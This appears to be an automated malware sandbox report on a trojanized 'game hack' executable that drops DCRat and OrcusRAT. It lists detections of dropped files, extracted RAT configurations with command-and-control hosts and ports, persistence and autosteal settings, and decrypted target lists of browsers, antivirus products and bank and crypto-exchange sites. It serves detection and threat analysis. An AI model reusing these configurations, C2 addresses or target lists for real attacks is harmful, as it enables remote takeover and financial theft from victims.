                      Source: C:\Program Files (x86)\MSECache\OfficeKMS\win8\SSblKNNQege.exeAvira: detection malicious, Label: TR/Dropper.Gen
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeAvira: detection malicious, Label: TR/Dropper.Gen
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\VaCm6yonii0zLXLvCqreXRVqw1.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                      Source: C:\Program Files (x86)\MSBuild\SSblKNNQege.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
                      Source: C:\Program Files (x86)\MSBuild\SSblKNNQege.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
                      Source: C:\Program Files (x86)\MSBuild\SSblKNNQege.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
                      Source: C:\Program Files (x86)\MSBuild\SSblKNNQege.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
                      Source: C:\Program Files (x86)\MSECache\OfficeKMS\win8\SSblKNNQege.exeAvira: detection malicious, Label: TR/Dropper.Gen
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeAvira: detection malicious, Label: VBS/Runner.VPG
                      Source: C:\Users\user\AppData\Local\Temp\B2ESObyLKs.batAvira: detection malicious, Label: BAT/Delbat.C
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeAvira: detection malicious, Label: HEUR/AGEN.1309946
                      Source: C:\Program Files (x86)\MSBuild\SSblKNNQege.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\mJEJ7PbY35CMaAu5227dvHv.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                      Found malware configuration
                      Source: 00000017.00000002.1959832866.000000001322D000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://117813cm.n9shteam.in/ExternalRequest", "MUTEX": "DCR_MUTEX-KJuu1JY0vqv02KLL4nsh", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                      Source: 13.2.MpDefenderCoreProtion.exe.46090d0.6.raw.unpackMalware Configuration Extractor: OrcusRAT {"AutostartBuilderProperty": {"AutostartMethod": "Disable", "TaskSchedulerTaskName": "sudik", "TaskHighestPrivileges": "true", "AutoSteal": "true", "Inject": "true", "RegistryHiddenStart": "true", "RegistryKeyName": "Sudik", "TryAllAutostartMethodsOnFail": "true"}, "ChangeAssemblyInformationBuilderProperty": {"ChangeAssemblyInformation": "false", "AssemblyTitle": null, "AssemblyDescription": null, "AssemblyCompanyName": null, "AssemblyProductName": null, "AssemblyCopyright": null, "AssemblyTrademarks": null, "AssemblyProductVersion": "1.0.0.0", "AssemblyFileVersion": "1.0.0.0"}, "ChangeCreationDateBuilderProperty": {"IsEnabled": "false", "NewCreationDate": "2016-11-05T21:17:40"}, "ChangeIconBuilderProperty": {"ChangeIcon": "false", "IconPath": null}, "ClientTagBuilderProperty": {"ClientTag": "GameHack"}, "ConnectionBuilderProperty": {"IpAddresses": [{"Ip": "25350.client.sudorat.top", "Port": "25350"}, {"Ip": "25350.client.sudorat.ru", "Port": "25350"}, {"Ip": "31.44.184.52", "Port": "25350"}]}, "DataFolderBuilderProperty": {"Path": "%appdata%\\Windows\\Defender\\"}, "DefaultPrivilegesBuilderProperty": {"RequireAdministratorRights": "true"}, "DisableInstallationPromptBuilderProperty": {"IsDisabled": "true"}, "FrameworkVersionBuilderProperty": {"FrameworkVersion": "NET35"}, "HideFileBuilderProperty": {"HideFile": "true"}, "InstallationLocationBuilderProperty": {"Path": "%appdata%\\Windows\\Defender\\MpDefenderCoreProtion.exe"}, "InstallBuilderProperty": {"Install": "true"}, "KeyloggerBuilderProperty": {"IsEnabled": "false"}, "MutexBuilderProperty": {"Mutex": "sudo_06kkh814g4vz7sfklrh1emcow75dz383"}, "ProxyBuilderProperty": {"ProxyOption": "None", "ProxyAddress": null, "ProxyPort": "1080", "ProxyType": "2"}, "ReconnectDelayProperty": {"Delay": "10000"}, "RequireAdministratorPrivilegesInstallerBuilderProperty": {"RequireAdministratorPrivileges": "true"}, "RespawnTaskBuilderProperty": {"IsEnabled": "true", "TaskName": "MpDefenderProtector"}, "ServiceBuilderProperty": {"Install": "false"}, "SetRunProgramAsAdminFlagBuilderProperty": {"SetFlag": "true"}, "WatchdogBuilderProperty": {"IsEnabled": "false", "Name": "aga.exe", "WatchdogLocation": "AppData", "PreventFileDeletion": "false"}}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Program Files (x86)\MSBuild\SSblKNNQege.exeReversingLabs: Detection: 78%
                      Source: C:\Program Files (x86)\MSECache\OfficeKMS\win8\SSblKNNQege.exeReversingLabs: Detection: 67%
                      Source: C:\Program Files (x86)\Microsoft Office\SSblKNNQege.exeReversingLabs: Detection: 78%
                      Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\SSblKNNQege.exeReversingLabs: Detection: 78%
                      Source: C:\Program Files\Microsoft\SSblKNNQege.exeReversingLabs: Detection: 67%
                      Source: C:\Program Files\Windows Portable Devices\SSblKNNQege.exeReversingLabs: Detection: 78%
                      Source: C:\ProgramData\WindowsHolographicDevices\SSblKNNQege.exeReversingLabs: Detection: 78%
                      Source: C:\Recovery\SSblKNNQege.exeReversingLabs: Detection: 78%
                      Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\SSblKNNQege.exeReversingLabs: Detection: 67%
                      Source: C:\Users\Default\Pictures\RuntimeBroker.exeReversingLabs: Detection: 78%
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeReversingLabs: Detection: 65%
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeReversingLabs: Detection: 84%
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeReversingLabs: Detection: 58%
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeReversingLabs: Detection: 67%
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeReversingLabs: Detection: 84%
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeReversingLabs: Detection: 78%
                      Source: C:\Users\user\Desktop\BpJZMyRc.logReversingLabs: Detection: 29%
                      Source: C:\Users\user\Desktop\ErvIhhWY.logReversingLabs: Detection: 33%
                      Source: C:\Users\user\Desktop\PxMOoBdB.logReversingLabs: Detection: 25%
                      Source: C:\Users\user\Desktop\WmQvmhxk.logReversingLabs: Detection: 70%
                      Source: C:\Users\user\Desktop\mOMkzqHG.logReversingLabs: Detection: 50%
                      Source: C:\Users\user\Desktop\syFrxmlp.logReversingLabs: Detection: 37%
                      Source: C:\Windows\Cursors\OfficeClickToRun.exeReversingLabs: Detection: 67%
                      Source: C:\Windows\L2Schemas\SSblKNNQege.exeReversingLabs: Detection: 78%
                      Source: C:\Windows\SoftwareDistribution\Download\9dbde960dbff0b004ef17a0616c3a8ef\RuntimeBroker.exeReversingLabs: Detection: 78%
                      Source: C:\Windows\security\database\SSblKNNQege.exeReversingLabs: Detection: 67%
                      Multi AV Scanner detection for submitted file
                      Source: GameHackBuild1.exe.bin.exeVirustotal: Detection: 61%Perma Link
                      Source: GameHackBuild1.exe.bin.exeReversingLabs: Detection: 63%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for dropped file
                      Source: C:\Program Files (x86)\MSECache\OfficeKMS\win8\SSblKNNQege.exeJoe Sandbox ML: detected
                      Source: C:\Users\Default\Pictures\RuntimeBroker.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\MSBuild\SSblKNNQege.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\MSECache\OfficeKMS\win8\SSblKNNQege.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\MSBuild\SSblKNNQege.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\MSBuild\SSblKNNQege.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\MSBuild\SSblKNNQege.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\MSBuild\SSblKNNQege.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\MSECache\OfficeKMS\win8\SSblKNNQege.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\MSBuild\SSblKNNQege.exeJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: GameHackBuild1.exe.bin.exeJoe Sandbox ML: detected
                      Sample uses string decryption to hide its real strings
                      Source: 00000017.00000002.1998107194.000000001BA70000.00000004.08000000.00040000.00000000.sdmpString decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Custom","_1":"True","_2":"True","_3":"True"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds"},"20c484a2-7b5b-481d-bf01-55d423c9c2fd":{"_0":"chrome|p|o\nfirefox|p|o\nsafari|p|o\nmsedge|p|o\nopera|p|o\nyandex|p|o\nbrave|p|o\nbrowser|p|o\n\nkaspersky|p|r\nnorton|p|r\navast|p|r\nmcafee|p|r\nbitdefender|p|r\neset|p|r\navg|p|r\nsophos|p|r\ntrendmicro|p|r\nwindowsdefender|p|r\n\nkaspersky|w|r\nnorton|w|r\navast|w|r\nmcafee|w|r\nbitdefender|w|r\neset|w|r\navg|w|r\nsophos|w|r\ntrendmicro|w|r\nwindowsdefender|w|r"},"90f3c523-0b6b-4956-a617-29c89ed8da84":{"_0":"amegybank.com;associatedbank.com;ally.com;bankofthewest.com;bank7.com;barringtonbank.com;bbt.com;becu.org;beverlybank.com;bmoharris.com;bridgeviewbank.com;cffc.com;chase.com;citizensbank.com;classicbank.com;comerica.com;corebank.com;crystallakebank.com;dime.com;dollarbank.com;easternbank.com;53.com;finemarkbank.com;firstcommercebank.net;gorhamsavings.bank;happybank.com;hinsdalebank.com;lakeforestbank.com;libertyvillebank.com;mtb.com;emarquettebank.com;merchantsbankal.com;midwestone.com;morganstanley.com;macu.com;nbarizona.com;nsbank.com;northbrookbank.com;norrybank.com;oldplanktrailbank.com;pnc.com;onlinebanking.regions.com;renasantbank.com;rhinebeckbank.com;bankschaumburg.com;bankstcharles.com;sbotl.com;suntrust.com;tbkbank.com;tdbank.com;tiaabank.com;townbank.us;umpquabank.com;vectrabank.com;villagebankonline.bank;wheatonbank.com;wintrustbank.com;zionsbank.com;yobit.net;freebitco.in;zb.com;binance.com;huobi.com;okex.com;hitbtc.com;bitfinex.com;kraken.com;bitstamp.net;payoneer.com;bittrex.com;gate.io;exmo.com;yobit.io;bitflyer.com;poloniex.com;kucoin.com;coinone.co.kr;livecoin.net;mercatox.com;localbitcoins.com;korbit.co.kr;cex.io;luno.com;rocktrading.com;etherdelta.com;bleutrade.com;anxpro.com;c-cex.com;gatecoin.com;bitkonan.com;jubi.com;koinex.in;koineks.com;kuna.io;koinim.com;kiwi-coin.com;leoxchange.com;lykke.com;magnr.com;localtrade.cc;lbank.info;itbit.com;litebit.eu;liqui.io;ecoin.cc;indx.ru;fybse.se;freiexchange.com;fybsg.com;wildbitcoin.com;betchain.com;ethexindia.com;litecoinlocal.net;gemini.com;gdax.com;gatehub.net;satoshitango.com;foxbit.com.br;flowbtc.com.br;exx.com;exrates.me;excambriorex.com;ezbtc.ca;fargobase.com;fcce.jp;getbtc.org;glidera.io;indacoin.com;igot.com;idex.market;independentreserve.com;mercadobitcoin.com.br;infinitycoin.exchange;ice3x.co.za;guldentrader.com;heatwallet.com;hypex.nl;isx.ca;negociecoins.com.br;tradesatoshi.com;topbtc.com;tidex.com;mydicewallet.com;tuxexchange.com;usd-x.com;urdubit.com;tidebit.com;tdax.com;stex.com;stellarterm.com;spacebtc.com;surbitcoin.com;buda.com;xbtce.com;yunbi.com;zyado.com;trade.z.com;zaif.jp;wavesplatform.com;vircurex.com;vbtc.exchange;vaultoro.com;coinmarketcap.com;vwlpro.com;walltime.info;southxchange.com;shapeshift.io;nocks.com;nlexch.com;novaexchange.com;mynxt.info;nzbcx.com;nevbit.com;mixcoins.com;mr.exchange;neraex.pro;dsx.uk;okcoin.com;liquid.com;quoine.com;quadrigacx.
                      Source: 00000017.00000002.1998107194.000000001BA70000.00000004.08000000.00040000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-KJuu1JY0vqv02KLL4nsh","0","Roblox NEW","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
                      Source: 00000017.00000002.1998107194.000000001BA70000.00000004.08000000.00040000.00000000.sdmpString decryptor: [["http://117813cm.n9shteam.in/","ExternalRequest"]]
                      Source: GameHackBuild1.exe.bin.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeDirectory created: C:\Program Files\Microsoft\SSblKNNQege.exe
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exeDirectory created: C:\Program Files\Microsoft\f2aefc5695405c
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeDirectory created: C:\Program Files\Windows Portable Devices\SSblKNNQege.exe
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeDirectory created: C:\Program Files\Windows Portable Devices\f2aefc5695405c
                      Source: GameHackBuild1.exe.bin.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: GameHackBuild1.exe.bin.exe
                      Source: Binary string: q$costura.orcus.staticcommands.pdb.zip source: MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002901000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003121000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 00000011.00000002.2044904606.0000000003181000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000002E81000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \Orcus-1.9.1-src-main\Orcus.Plugins\obj\Release\Orcus.Plugins.pdb8 source: MpDefenderProtector.exe, 00000007.00000002.1323937386.0000000004EC0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: D:\Dokumente\GitHub\starksoft-aspen\Starksoft.Aspen\obj\Release\starksoft.aspen.pdbL source: RegAsm.exe, 00000012.00000002.2519892872.00000000031F8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.00000000031EA000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000003144000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2540236748.0000000005E90000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: \Orcus-1.9.1-src-main\Orcus.StaticCommands\obj\Release\Orcus.StaticCommands.pdb source: RegAsm.exe, 00000012.00000002.2539787539.0000000005E60000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.00000000030B5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000003144000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: costura.fluentcommandlineparser.pdb.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: orcus.plugins;costura.orcus.plugins.dll.zip;costura.orcus.plugins.pdb.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: costura.orcus.shared.pdb.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002901000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003121000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 00000011.00000002.2044904606.0000000003181000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000002E81000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \Orcus-1.9.1-src-main\Orcus.Shared.Utilities\obj\Release\Orcus.Shared.Utilities.pdb source: MpDefenderProtector.exe, 00000007.00000002.1339235069.00000000058A0000.00000004.08000000.00040000.00000000.sdmp, MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002949000.00000004.00000800.00020000.00000000.sdmp, MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002AFB000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003355000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.000000000316A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.00000000030B5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000002ECA000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: q'costura.fluentcommandlineparser.pdb.zip source: MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002901000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003121000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 00000011.00000002.2044904606.0000000003181000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000002E81000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \Orcus-1.9.1-src-main\Orcus.Plugins\obj\Release\Orcus.Plugins.pdb source: MpDefenderProtector.exe, 00000007.00000002.1323937386.0000000004EC0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: costura.orcus.staticcommands.pdb.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: directoryinfoex?costura.directoryinfoex.dll.zip?costura.directoryinfoex.pdb.zipUes.microsoft.win32.taskscheduler.resourcesucostura.es.microsoft.win32.taskscheduler.resources.dll.zip/fluentcommandlineparserOcostura.fluentcommandlineparser.dll.zipOcostura.fluentcommandlineparser.pdb.zipUfr.microsoft.win32.taskscheduler.resourcesucostura.fr.microsoft.win32.taskscheduler.resources.dll.zip/icsharpcode.sharpziplibOcostura.icsharpcode.sharpziplib.dll.zipUit.microsoft.win32.taskscheduler.resourcesucostura.it.microsoft.win32.taskscheduler.resources.dll.zip+jetbrains.annotationsKcostura.jetbrains.annotations.dll.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: costura.shelllibrary.pdb.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002901000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003121000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 00000011.00000002.2044904606.0000000003181000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000002E81000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: orcus.shared9costura.orcus.shared.dll.zip9costura.orcus.shared.pdb.zip-orcus.shared.utilitiesMcostura.orcus.shared.utilities.dll.zipMcostura.orcus.shared.utilities.pdb.zip)orcus.staticcommandsIcostura.orcus.staticcommands.dll.zipIcostura.orcus.staticcommands.pdb.zip%sharpdx.direct3d11Ecostura.sharpdx.direct3d11.dll.zip#sharpdx.direct3d9Ccostura.sharpdx.direct3d9.dll.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: D:\Dokumente\GitHub\starksoft-aspen\Starksoft.Aspen\obj\Release\starksoft.aspen.pdb source: RegAsm.exe, 00000012.00000002.2519892872.00000000031F8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.00000000031EA000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000003144000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2540236748.0000000005E90000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\Visual Studio 2010\Projects\TaskService\obj\Release\Microsoft.Win32.TaskScheduler.pdb source: MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.00000000042DB000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003355000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1366464067.00000000060F0000.00000004.08000000.00040000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.00000000041DA000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: costura.directoryinfoex.pdb.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002901000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003121000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 00000011.00000002.2044904606.0000000003181000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000002E81000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: q&costura.orcus.shared.utilities.pdb.zip source: MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002901000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003121000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 00000011.00000002.2044904606.0000000003181000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000002E81000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: opuswrapper7costura.opuswrapper.dll.zip7costura.opuswrapper.pdb.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \Orcus-1.9.1-src-main\Orcus.Shared\obj\Release\Orcus.Shared.pdb source: MpDefenderProtector.exe, 00000007.00000002.1315906643.0000000003A65000.00000004.00000800.00020000.00000000.sdmp, MpDefenderProtector.exe, 00000007.00000002.1335917183.0000000005270000.00000004.08000000.00040000.00000000.sdmp, MpDefenderCoreProtion.exe, 00000011.00000002.2071723679.000000000425D000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: costura.opuswrapper.pdb.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002901000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003121000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 00000011.00000002.2044904606.0000000003181000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000002E81000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: shelllibrary9costura.shelllibrary.dll.zip9costura.shelllibrary.pdb.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: costura.orcus.shared.utilities.pdb.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: costura.orcus.plugins.pdb.zip source: GameHackBuild1.exe.bin.exe, 00000000.00000003.1270548712.0000000004F89000.00000004.00000020.00020000.00000000.sdmp, MpDefenderProtector.exe, 00000007.00000002.1312934413.0000000002901000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1339479653.0000000004533000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 0000000D.00000002.1337493917.0000000003121000.00000004.00000800.00020000.00000000.sdmp, MpDefenderCoreProtion.exe, 00000011.00000002.2044904606.0000000003181000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2519892872.0000000002E81000.00000004.00000800.00020000.00000000.sdmp

                      Spreading

                      barindex
                      Infects executable files (exe, dll, sys, html)
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
